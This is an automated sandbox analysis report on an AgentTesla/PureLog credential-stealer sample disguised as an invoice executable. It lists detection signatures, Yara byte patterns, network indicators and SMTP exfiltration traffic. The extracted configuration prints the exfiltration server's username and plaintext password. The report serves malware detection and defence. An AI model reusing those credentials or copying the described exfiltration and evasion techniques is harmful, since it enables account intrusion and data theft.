Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Factura adjunta.exe

Overview

General Information

Sample name:Factura adjunta.exe
Analysis ID:1467274
MD5:d1e434198eb156114e542143d9a16745
SHA1:ed52264091479d5cd8eea42edd851eaf69958f0a
SHA256:093020f94f927cc5488bc0853d06c3c1ec59c59d337ad66e3ff1c3ded8e6bab1
Tags:exe
Infos:

Detection

AgentTesla, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Check if machine is in data center or colocation facility
Contains functionality to log keystrokes (.Net Source)
Installs a global keyboard hook
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Generic Downloader
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Factura adjunta.exe (PID: 6312 cmdline: "C:\Users\user\Desktop\Factura adjunta.exe" MD5: D1E434198EB156114E542143D9A16745)
    • RegSvcs.exe (PID: 5688 cmdline: "C:\Users\user\Desktop\Factura adjunta.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.floormelody.com.sg", "Username": "payments@floormelody.com.sg", "Password": "FloorMelody0208"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000002.00000002.4640275179.0000000002F81000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000002.00000002.4640275179.0000000002F89000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000002.00000002.4640275179.0000000002F57000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000002.00000002.4640275179.0000000002F57000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000002.00000002.4641648764.0000000003EF1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 19 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              2.2.RegSvcs.exe.2b1f4a6.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                2.2.RegSvcs.exe.2b1f4a6.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  2.2.RegSvcs.exe.2b1f4a6.1.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    2.2.RegSvcs.exe.2b1f4a6.1.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                    • 0x3f34d:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                    • 0x3f3bf:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                    • 0x3f449:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                    • 0x3f4db:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                    • 0x3f545:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                    • 0x3f5b7:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                    • 0x3f64d:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                    • 0x3f6dd:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                    0.2.Factura adjunta.exe.e20000.1.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                    • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
                    • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
                    • 0x700:$s3: 83 EC 38 53 B0 EA 88 44 24 2B 88 44 24 2F B0 0B 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
                    • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
                    • 0x1e9d0:$s5: delete[]
                    • 0x1de88:$s6: constructor or from DllMain.
                    Click to see the 70 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Suspicious Outbound SMTP Connections
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 101.100.211.111, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 5688, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49713

                    Snort Signatures

                    Timestamp:07/04/24-00:04:15.983243
                    SID:2030171
                    Source Port:49713
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 2.2.RegSvcs.exe.3ef6458.7.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.floormelody.com.sg", "Username": "payments@floormelody.com.sg", "Password": "FloorMelody0208"}
                    Multi AV Scanner detection for submitted file
                    Source: Factura adjunta.exeReversingLabs: Detection: 63%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for sample
                    Source: Factura adjunta.exeJoe Sandbox ML: detected
                    Source: Factura adjunta.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.6:49711 version: TLS 1.2
                    Source: Binary string: _.pdb source: RegSvcs.exe, 00000002.00000002.4639975848.0000000002ADF000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4641648764.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4640161809.0000000002E70000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: wntdll.pdbUGP source: Factura adjunta.exe, 00000000.00000003.2189209152.0000000003570000.00000004.00001000.00020000.00000000.sdmp, Factura adjunta.exe, 00000000.00000003.2189483063.00000000033D0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: Factura adjunta.exe, 00000000.00000003.2189209152.0000000003570000.00000004.00001000.00020000.00000000.sdmp, Factura adjunta.exe, 00000000.00000003.2189483063.00000000033D0000.00000004.00001000.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_00814696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00814696
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_0081C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0081C9C7
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_0081C93C FindFirstFileW,FindClose,0_2_0081C93C
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_0081F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0081F200
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_0081F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0081F35D
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_0081F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0081F65E
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_00813A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00813A2B
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_00813D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00813D4E
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_0081BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0081BF27

                    Networking

                    barindex
                    Snort IDS alert for network traffic
                    Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.6:49713 -> 101.100.211.111:587
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.2e70ee8.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.2b2038e.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.3f43f90.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.5270000.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.3ef6458.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.2b1f4a6.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.2e70000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.3ef5570.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.4642126380.0000000005270000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4640161809.0000000002E70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: global trafficTCP traffic: 192.168.2.6:49713 -> 101.100.211.111:587
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                    Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                    Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                    Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
                    Source: Joe Sandbox ViewASN Name: VODIEN-AS-AP-LOC2VodienInternetSolutionsPteLtdSG VODIEN-AS-AP-LOC2VodienInternetSolutionsPteLtdSG
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: ip-api.com
                    Source: global trafficTCP traffic: 192.168.2.6:49713 -> 101.100.211.111:587
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_008225E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_008225E2
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                    Source: global trafficDNS traffic detected: DNS query: ip-api.com
                    Source: global trafficDNS traffic detected: DNS query: mail.floormelody.com.sg
                    Source: RegSvcs.exe, 00000002.00000002.4640275179.0000000002F44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                    Source: RegSvcs.exe, 00000002.00000002.4639975848.0000000002ADF000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4641648764.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4640275179.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4642126380.0000000005270000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4640161809.0000000002E70000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                    Source: RegSvcs.exe, 00000002.00000002.4640275179.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.floormelody.com.sg
                    Source: RegSvcs.exe, 00000002.00000002.4640275179.0000000002EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: RegSvcs.exe, 00000002.00000002.4639975848.0000000002ADF000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4641648764.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4642126380.0000000005270000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4640161809.0000000002E70000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: RegSvcs.exe, 00000002.00000002.4639975848.0000000002ADF000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4641648764.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4640275179.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4642126380.0000000005270000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4640161809.0000000002E70000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                    Source: RegSvcs.exe, 00000002.00000002.4640275179.0000000002EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                    Source: RegSvcs.exe, 00000002.00000002.4640275179.0000000002EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.6:49711 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 2.2.RegSvcs.exe.5270000.8.raw.unpack, SKTzxzsJw.cs.Net Code: b2gICnV53O
                    Installs a global keyboard hook
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_0082425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalFix,CloseClipboard,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnWire,CountClipboardFormats,CloseClipboard,0_2_0082425A
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_00824458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,_wcscpy,GlobalUnWire,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00824458
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_0082425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalFix,CloseClipboard,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnWire,CountClipboardFormats,CloseClipboard,0_2_0082425A
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_00810219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00810219
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_0083CDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0083CDAC

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 2.2.RegSvcs.exe.2b1f4a6.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Factura adjunta.exe.e20000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 2.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 2.2.RegSvcs.exe.3ef5570.6.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 2.2.RegSvcs.exe.2e70ee8.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 2.2.RegSvcs.exe.3ef6458.7.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 2.2.RegSvcs.exe.2e70ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 2.2.RegSvcs.exe.2b2038e.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 2.2.RegSvcs.exe.3f43f90.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 2.2.RegSvcs.exe.5270000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 2.2.RegSvcs.exe.3ef6458.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 2.2.RegSvcs.exe.2b1f4a6.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 2.2.RegSvcs.exe.2e70000.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 2.2.RegSvcs.exe.5270000.8.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 2.2.RegSvcs.exe.2b2038e.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 2.2.RegSvcs.exe.3f43f90.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 2.2.RegSvcs.exe.2e70000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 2.2.RegSvcs.exe.3ef5570.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 00000002.00000002.4638677256.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000002.00000002.4642126380.0000000005270000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 00000000.00000002.2199198462.0000000000E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000002.00000002.4640161809.0000000002E70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Binary is likely a compiled AutoIt script file
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: This is a third-party compiled AutoIt script.0_2_007B3B4C
                    Source: Factura adjunta.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: Factura adjunta.exe, 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_ee67c591-3
                    Source: Factura adjunta.exe, 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_a27b4c4a-0
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007B3633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,0_2_007B3633
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_0083C220 NtdllDialogWndProc_W,0_2_0083C220
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_0083C27C ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,0_2_0083C27C
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_0083C49C PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,0_2_0083C49C
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_0083C788 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,0_2_0083C788
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_0083C8EE DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,0_2_0083C8EE
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_0083C86D SendMessageW,NtdllDialogWndProc_W,0_2_0083C86D
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_0083CBAE NtdllDialogWndProc_W,0_2_0083CBAE
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_0083CBF9 NtdllDialogWndProc_W,0_2_0083CBF9
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_0083CB50 NtdllDialogWndProc_W,0_2_0083CB50
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_0083CB7F NtdllDialogWndProc_W,0_2_0083CB7F
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_0083CC2E ClientToScreen,NtdllDialogWndProc_W,0_2_0083CC2E
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_0083CDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0083CDAC
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_0083CD6C GetWindowLongW,NtdllDialogWndProc_W,0_2_0083CD6C
